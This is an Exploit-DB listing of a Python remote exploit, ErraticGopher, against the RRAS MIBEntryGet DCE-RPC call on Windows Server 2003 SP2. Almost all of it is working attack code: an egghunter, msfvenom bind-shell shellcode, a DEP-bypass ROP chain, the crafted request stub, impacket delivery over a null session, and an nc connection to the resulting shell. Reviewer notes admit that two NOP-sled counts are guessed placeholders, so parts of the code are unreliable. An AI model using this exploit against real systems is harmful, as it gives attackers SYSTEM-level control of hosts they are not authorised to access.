Edb-id: 41929 |
Author: vportal |
Published: 2017-04-25 |
CVE: N/A |
Type: Remote |
Platform: Windows |
Aliases: Erraticgopher |
Advisory/source: N/A |
Tags: N/A |
vulnerable App: N/A |
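#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################################
#                     by Victor Portal (vportal)                          #
#                   for educational purpose only                          #
###########################################################################
# Python version of the ErraticGopher exploit, probably with some         #
# modifications. ErraticGopher exploits a memory corruption (it looks     #
# like a heap overflow) in the Windows DCE-RPC call MIBEntryGet.          #
# Because of the magic bytes, the application redirects execution into    #
# iprtrmgr.dll, where a REP MOVS instruction (0x641194f5) copies the      #
# whole injected stub from the heap to the stack, overwriting a return    #
# address as well as the SEH handler stored on the stack. That makes it   #
# possible to control the execution flow, disable DEP and jump to the     #
# shellcode as SYSTEM.                                                    #
###########################################################################
# The exploit only works if the target has the RRAS service enabled.
# Tested on Windows Server 2003 SP2.
#
# NOTE(review): this listing was recovered from a whitespace/case-mangled
# copy of the original. Everything that could be checked (the 32-byte
# egghunter, the 355-byte msfvenom payload in 13-byte rows, the 32-byte
# magic header, the padding arithmetic) was restored as found. Two NOP-sled
# repeat counts inside the ROP chain were lost in that copy; they are kept
# as clearly marked placeholder constants below and MUST be confirmed
# against the original EDB-41929 source before this is used.

import os                      # kept from the original listing (no longer used)
import struct                  # kept from the original listing (unused)
import subprocess
import sys
import time
from threading import Thread   # kept from the original listing (unused)

# RRAS (router MIB) DCE-RPC interface UUID and version; bound over the
# \pipe\browser named pipe.
RRAS_UUID = ('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')

# Opnum of MIBEntryGet on that interface -- the vulnerable function.
MIBENTRYGET_OPNUM = 0x1d

# Port the bind shell listens on. Must match the `lport=` the SHELLCODE
# below was generated with.
BIND_PORT = 4444

# 32-byte egghunter (the NtAccessCheckAndAuditAlarm / int 0x2e variant):
#   or dx,0xfff ; inc edx ; push edx ; push 2 ; pop eax ; int 0x2e ;
#   cmp al,5 ; pop edx ; je <page loop> ; mov eax,"w00t" ; mov edi,edx ;
#   scasd ; jne ; scasd ; jne ; jmp edi
# It searches memory for the tag "w00t" twice in a row ("w00tw00t") and
# jumps to whatever follows it, i.e. to SHELLCODE.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
    b"\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
# 355 bytes, encoded to avoid the NULL byte (-b "\x00"); listens on BIND_PORT.
SHELLCODE = (
    b"\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
    b"\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
    b"\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
    b"\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
    b"\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
    b"\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
    b"\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
    b"\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
    b"\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
    b"\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
    b"\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
    b"\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
    b"\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
    b"\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
    b"\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
    b"\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
    b"\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
    b"\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
    b"\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
    b"\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
    b"\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
    b"\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
    b"\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
    b"\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
    b"\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
    b"\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
    b"\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
    b"\xc4\x25\x3d\xe9"
)

# NOTE(review): PLACEHOLDERS. The recovered copy reads
#   rop += "\x90" *  + egghunter + "\x90"*42      (count missing)
#   rop += "\x90"                                 (copy cut off here)
# The original repeat counts could not be recovered from this page. One
# DWORD (4) is used only so the chain assembles; confirm both values
# against the original EDB-41929 listing before use -- they decide where
# the egghunter sits relative to the overwritten return address.
NOP_SLED_BEFORE_EGGHUNTER = 4
NOP_SLED_AFTER_NX_DISABLE = 4

# The 32 bytes the vulnerable code path keys on ("magic bytes" in the
# original); the exact field meanings are not documented in the listing.
MAGIC_HEADER = (
    b"\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06"
    b"\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00"
)
MAGIC_SEPARATOR = b"\x12"
MAGIC_TRAILER = b"\x04\x00\x00\x00\x00\x00\x00\x00"

# Fixed size of the region between MAGIC_HEADER and MAGIC_SEPARATOR that
# receives the ROP chain, egg and shellcode; the original listing pads it
# with "\x42" up to exactly this many bytes.
BODY_LEN = 1313
TAIL_FILL_LEN = 522


def build_rop_chain():
    """Return the DEP-bypass chain for Windows Server 2003 SP2.

    Windows Server 2003 has no ASLR, so every gadget address is hard-coded
    for that build and will not transfer to any other version. Gadget
    comments are the original author's; the DLL is given only where the
    listing named it.
    """
    rop = b"\x30\xdb\xc0\x71"                       # push esp ; pop ebp ; retn   (ws2_32.dll)
    rop += b"\x45" * 16
    rop += b"\xe9\x77\xc1\x77"                      # push esp ; pop ebp ; retn 4 (gdi32.dll)
    rop += b"\x5d\x7a\x81\x7c"                      # ret 20
    rop += b"\x71\x42\x38\x77"                      # jmp esp
    rop += b"\xf6\xe7\xbd\x77"                      # add esp, 2c ; retn          (msvcrt.dll)
    rop += b"\x90" * NOP_SLED_BEFORE_EGGHUNTER + EGGHUNTER + b"\x90" * 42
    rop += b"\x17\xf5\x83\x7c"                      # disable NX routine
    rop += b"\x90" * NOP_SLED_AFTER_NX_DISABLE      # see NOTE(review) on the constant
    return rop


def build_stub(shellcode=SHELLCODE):
    """Assemble the MIBEntryGet request body (the "stub") as bytes.

    Layout, as in the original listing:
      MAGIC_HEADER | "A"*20 | rop | "\xcc"*100 | "w00tw00t" | shellcode |
      "B" padding to BODY_LEN | MAGIC_SEPARATOR | "F"*TAIL_FILL_LEN | MAGIC_TRAILER

    The padding is BODY_LEN - 20 - len(rop) - 100 - 8 - len(shellcode),
    exactly the original's arithmetic. The original multiplied a possibly
    negative count, which Python silently turns into an empty string and
    therefore into a shorter, mis-aligned stub; here an oversized payload
    raises ValueError instead.

    :param shellcode: bytes placed right after the "w00tw00t" egg.
    :raises ValueError: if rop + egg + shellcode do not fit in BODY_LEN.
    """
    body = b"\x41" * 20 + build_rop_chain() + b"\xcc" * 100 + b"w00tw00t" + shellcode
    pad = BODY_LEN - len(body)
    if pad < 0:
        raise ValueError(
            "rop chain + egg + shellcode is %d bytes, %d over the %d-byte body"
            % (len(body), -pad, BODY_LEN)
        )
    return (
        MAGIC_HEADER
        + body
        + b"\x42" * pad
        + MAGIC_SEPARATOR
        + b"\x46" * TAIL_FILL_LEN
        + MAGIC_TRAILER
    )


def connect_rras(target):
    """Open ncacn_np:<target>[\\pipe\\browser] and bind the RRAS interface.

    impacket is imported here rather than at module level so the payload
    builders above can be imported and checked on a box without it.
    No credentials are set on the transport, so this relies on the pipe
    accepting an anonymous (null-session) connection -- presumably the
    case on the tested 2003 SP2 target; confirm before use elsewhere.

    :param target: hostname or IP of the RRAS host.
    :returns: a bound DCE-RPC object ready for .call().
    """
    from impacket import smb, dcerpc      # kept from the original listing (unused)
    from impacket import uuid
    from impacket.dcerpc.v5 import transport

    print('[-]Initiating connection')
    trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
    trans.connect()
    print('[-]connected to ncacn_np:%s[\\pipe\\browser]' % target)
    # Original spelling of the DCE/RPC object construction; trans.get_dce_rpc()
    # is presumably the equivalent current impacket API.
    dce = trans.DCERPC_class(trans)
    dce.bind(uuid.uuidtup_to_bin(RRAS_UUID))   # RRAS DCE-RPC interface
    return dce


def main(argv=None):
    """Send the stub to MIBEntryGet on argv[1], then connect to the bind shell.

    :param argv: argument vector; defaults to sys.argv.
    :returns: process exit status (2 on usage error, else nc's status).
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 2:
        sys.stderr.write('usage: %s <target>\n' % argv[0])
        return 2
    target = argv[1]

    dce = connect_rras(target)
    dce.call(MIBENTRYGET_OPNUM, build_stub())   # 0x1d MIBEntryGet (vulnerable function)
    print('[-]Exploit sent to target successfully...')
    print('Waiting for shell...')
    time.sleep(5)   # give the bind shell a moment to start listening
    # argv list, no shell: the target string is never re-parsed by /bin/sh.
    return subprocess.call(['nc', target, str(BIND_PORT)])


if __name__ == '__main__':
    sys.exit(main())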
Microsoft Windows Server 2003 SP2 - 'ErraticGopher' SMB Remote Code Execution